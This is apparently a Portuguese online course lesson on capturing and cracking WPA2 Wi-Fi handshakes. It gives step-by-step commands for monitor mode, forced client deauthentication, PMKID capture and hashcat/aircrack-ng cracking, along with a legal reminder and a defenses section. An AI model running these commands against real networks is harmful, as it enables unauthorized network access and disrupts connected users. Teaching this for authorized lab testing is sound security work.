Cyber Security Academy · Aula

Captura e Quebra do Handshake WPA2

Capture um handshake de quatro vias com o aircrack-ng e tente ataques de dicionário com o Hashcat.

Aula 2 de 413 etapas

Captura e Quebra do Handshake WPA2 é uma aula grátis de Cyber Security Academy no CoddyKit. Esta é a aula 2 de 4. Você pode ler a aula completa abaixo gratuitamente — depois pratica ao vivo no navegador com um editor de código integrado e um tutor de IA 24/7. Faz parte do caminho de aprendizado de Cyber Security Academy, e seu progresso é sincronizado entre a web e o app CoddyKit. O curso de Cyber Security Academy inclui 4 aulas no total.

A negociação de 4 vias

Quando um cliente se conecta a uma rede WPA2, a negociação de 4 vias deriva a Chave Transitória por Par (PTK) a partir da PMK (derivada da PSK) e de valores aleatórios. Capturar essa negociação permite a quebra de senhas sem conexão.

Configurando o modo monitor

O modo monitor permite que a placa sem fio capture todos os quadros, independentemente do destino, o que é necessário para a captura passiva da negociação. Ele só funciona com placas compatíveis com o modo monitor.

# Check wireless interface
iwconfig

# Enable monitor mode
sudo airmon-ng start wlan0
# Creates: wlan0mon

# Kill interfering processes first:
sudo airmon-ng check kill

Captura passiva da negociação

O Airodump-ng captura quadros passivamente. Aguarde um cliente se conectar naturalmente ou force uma reconexão por meio de desautenticação. A captura da negociação aparece no canto superior direito da saída do airodump.

# Scan for networks
sudo airodump-ng wlan0mon

# Target a specific AP (replace values)
sudo airodump-ng -c 6 \
  --bssid AA:BB:CC:DD:EE:FF \
  -w handshake_capture \
  wlan0mon

# Top right shows: WPA handshake: AA:BB:...

Ataque de desautenticação

O envio de quadros de desautenticação falsificados força os clientes conectados a se desconectarem e reconectarem, iniciando uma nova captura da negociação. Essa ação gera muitos sinais e pode ser detectada, além de exigir que o cliente esteja dentro do alcance.

# Send deauth frames (authorized labs only)
sudo aireplay-ng -0 5 \
  -a AA:BB:CC:DD:EE:FF \
  -c CC:DD:EE:FF:00:11 \
  wlan0mon

# -0 5 = send 5 deauth frames
# -a = AP MAC
# -c = client MAC (or omit for broadcast)

Ataque de PMKID: nenhum cliente necessário

O ataque de PMKID (hcxdumptool) captura o PMKID de quadros de sinalização e sondagem sem exigir um cliente conectado. É mais rápido de obter e igualmente suscetível à quebra que uma negociação completa.

# Capture PMKID
hcxdumptool -i wlan0mon --enable_status=1 \
  -o pmkid.pcapng

# Convert for Hashcat
hcxpcapngtool -o hash.hc22000 pmkid.pcapng

# Crack with Hashcat mode 22000
hashcat -m 22000 hash.hc22000 rockyou.txt

Quebrando a negociação com Hashcat

Converta o arquivo de captura e faça um ataque com o modo 22000 do Hashcat (formato unificado do WPA2) ou com o modo 2500 (legado). Utilize rockyou.txt junto com regras para obter os melhores resultados.

# Convert pcap to Hashcat format
hcxpcapngtool -o hash.hc22000 handshake_capture-01.cap

# Crack with dictionary
hashcat -m 22000 hash.hc22000 rockyou.txt

# With rules
hashcat -m 22000 hash.hc22000 rockyou.txt -r best64.rule

# Brute force (short passwords)
hashcat -m 22000 hash.hc22000 -a 3 ?d?d?d?d?d?d?d?d

Quebrando com Aircrack-ng

O Aircrack-ng realiza a quebra de WPA2 baseada em CPU diretamente a partir do arquivo de captura. É mais lento que a quebra em GPU do Hashcat, mas não exige conversão de formato.

# Crack with aircrack-ng
aircrack-ng -w rockyou.txt handshake_capture-01.cap

# With multiple wordlists:
aircrack-ng -w wordlist1.txt,wordlist2.txt capture-01.cap

Estratégia de lista de palavras

O sucesso da quebra de senhas WPA2 depende inteiramente da qualidade da lista de palavras. Utilize: rockyou.txt como base, conjuntos de regras do Hashcat para mutações, listas específicas da empresa (nome+ano+símbolo) e listas direcionadas obtidas com OSINT.

A realidade do tempo de quebra

Uma senha aleatória de WPA2 com 20 ou mais caracteres é inviável de quebrar computacionalmente. A quebra só é prática contra senhas curtas ou baseadas em dicionário. Por isso, o comprimento e a aleatoriedade da senha são mais importantes que regras de complexidade.

Defesas

Utilize WPA3-SAE (imune a ataques de dicionário sem conexão), ou WPA2 com uma frase-senha aleatória de 20 ou mais caracteres, e WPA2-Enterprise com EAP-TLS (certificados em vez de senhas).

Lembrete legal

Capturar negociações WPA2 em redes que não pertencem a você é ilegal. Todas as técnicas apresentadas aqui se aplicam apenas às suas próprias redes de teste ou a ambientes de laboratório autorizados (por exemplo, laboratório doméstico ou AP dedicado para testes).

Verificação rápida

O que o ataque de PMKID aprimora em relação à captura de negociação padrão?

Resumo: quebra do WPA2

Capturar uma negociação WPA2 (ou um PMKID) transforma a quebra de Wi-Fi em um ataque de dicionário sem conexão. O sucesso depende inteiramente da força da senha: senhas curtas e baseadas em dicionário são quebradas rapidamente, enquanto as longas e aleatórias são praticamente impossíveis de quebrar. Proteja-se com WPA3-SAE, frases-senha fortes e WPA2-Enterprise para redes corporativas.

Grátis para começar

Aprenda Cyber Security Academy com um tutor de IA — grátis

Escreva e execute código real no seu navegador, obtenha ajuda instantânea de um tutor de IA 24/7 e continue de onde parou na web ou no app.

Cursos
76
Aulas
303

Perguntas Frequentes

A aula “Captura e Quebra do Handshake WPA2” é grátis?

Sim — o texto completo de “Captura e Quebra do Handshake WPA2” é grátis para ler aqui na web. Para praticá-la interativamente (um editor de código integrado e um tutor de IA 24/7) e desbloquear o restante do curso de Cyber Security Academy, atualize para CoddyKit PRO. O curso de Cyber Security Academy inclui 4 aulas no total.

O que vou aprender em “Captura e Quebra do Handshake WPA2”?

Capture um handshake de quatro vias com o aircrack-ng e tente ataques de dicionário com o Hashcat. Você pratica Cyber Security Academy com código prático que executa diretamente no navegador, e um tutor de IA 24/7 responde suas dúvidas enquanto trabalha na aula.

Preciso ter experiência prévia para começar Cyber Security Academy?

Nenhuma experiência prévia é necessária. Cyber Security Academy no CoddyKit é estruturado para alunos iniciantes até avançados, então você pode começar aqui ou desde o início e aprender no seu ritmo. Esta é a aula 2 de 4.

Quanto tempo leva a aula “Captura e Quebra do Handshake WPA2”?

A maioria das aulas CoddyKit leva cerca de 5–10 minutos. Cada uma é compacta e interativa, então você faz progresso constante e retoma exatamente de onde parou entre web e app.

Posso escrever e executar código nesta aula de Cyber Security Academy?

Sim. Cada aula de Cyber Security Academy inclui um editor de código integrado, então você escreve e executa código real direto no navegador e recebe feedback de IA instantaneamente — nenhuma configuração local necessária.

Todas as aulas deste curso

  1. Protocolos de Segurança 802.11: WEP, WPA2 e WPA3
  2. Captura e Quebra do Handshake WPA2
  3. Ataques Evil Twin e de Portal Cativo
  4. Wi-Fi Empresarial: EAP e RADIUS
← Voltar para Cyber Security Academy